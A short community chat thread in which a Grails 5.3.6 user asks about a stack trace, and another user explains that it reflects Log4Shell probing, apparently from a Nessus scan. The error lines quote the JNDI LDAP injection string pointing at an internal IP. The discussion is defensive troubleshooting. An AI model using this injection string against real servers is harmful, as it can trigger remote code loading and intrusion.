Anybody has seen this error?
java.net.MalformedURL...
# questionso
orrego
06/09/2024, 12:58 AMAnybody has seen this error?
java.net.MalformedURLException: unknown protocol: ${jndildap//172.16.2.141:57265/nessus}
java.base/java.net.URL.(URL.java:452)
java.base/java.net.URL.(URL.java:338)
java.base/java.net.URL.(URL.java:361)
asset.pipeline.utils.net.Urls.getDefaultPort(Urls.java:193)
asset.pipeline.grails.utils.net.HttpServletRequests.getAuthorityUrlSansScheme(HttpServletRequests.java:86)
asset.pipeline.grails.utils.net.HttpServletRequests.getBaseUrlSansScheme(HttpServletRequests.java:139)
asset.pipeline.grails.utils.net.HttpServletRequests.getBaseUrlWithScheme(HttpServletRequests.java:123)
asset.pipeline.grails.utils.net.HttpServletRequests.getBaseUrlWithScheme(HttpServletRequests.java:115)
asset.pipeline.grails.AssetProcessorService.makeServerURL(AssetProcessorService.groovy:167)
asset.pipeline.grails.CachingLinkGenerator.makeServerURL(CachingLinkGenerator.groovy:38)
org.grails.web.mapping.DefaultLinkGenerator.getServerBaseURL(DefaultLinkGenerator.groovy:423)
grails.web.mapping.ResponseRedirector.redirect(ResponseRedirector.groovy:107)
orrego
06/09/2024, 12:58 AMi am not using ldap and no idea about that IP and /nessus
orrego
06/09/2024, 12:58 AMgrails 5.3.6
orrego
06/09/2024, 12:59 AMhere is another error with now a different IP:
java.net.MalformedURLException: unknown protocol: ${jndi:ldap://172.16.2.141:56562/nessus}
orrego
06/09/2024, 12:59 AMsorry different port
p
paulk_asert
06/09/2024, 11:53 AMI can't say I am an expert on your issue but what you show seems weird in terms of Groovy syntax. There seems to be missing quotes. But it could be that you have quotes that aren't being displayed correctly in the error message.
o
orrego
06/10/2024, 12:33 AMThis error is not part of my code. I think I have a malware. I do not call that ip
p
paulk_asert
06/10/2024, 12:45 AMIt does look like an attempted log4shell exploit:
https://security.stackexchange.com/questions/272736/explain-jndildap-spams
https://tblocks.com/articles/how-to-prevent-a-log4j-jndi-attack/
https://qwiet.ai/log4shell-jndi-injection-via-attackable-log4j/
So, not so much malware, but someone playing with a reachable server running your software.
The error message doesn't seem to indicate that logging is on the stack trace, but the attempt hitting another part of your system. It seems that you have jndi disabled which is what you'd want to avoid the exploit - though I think it is only jndi when used with a vulnerable log4j. I haven't developed any public grails app recently, so I don't know if there is a standard way to catch such attempts.
o
orrego
06/10/2024, 4:19 AMThanks for your response
2 Views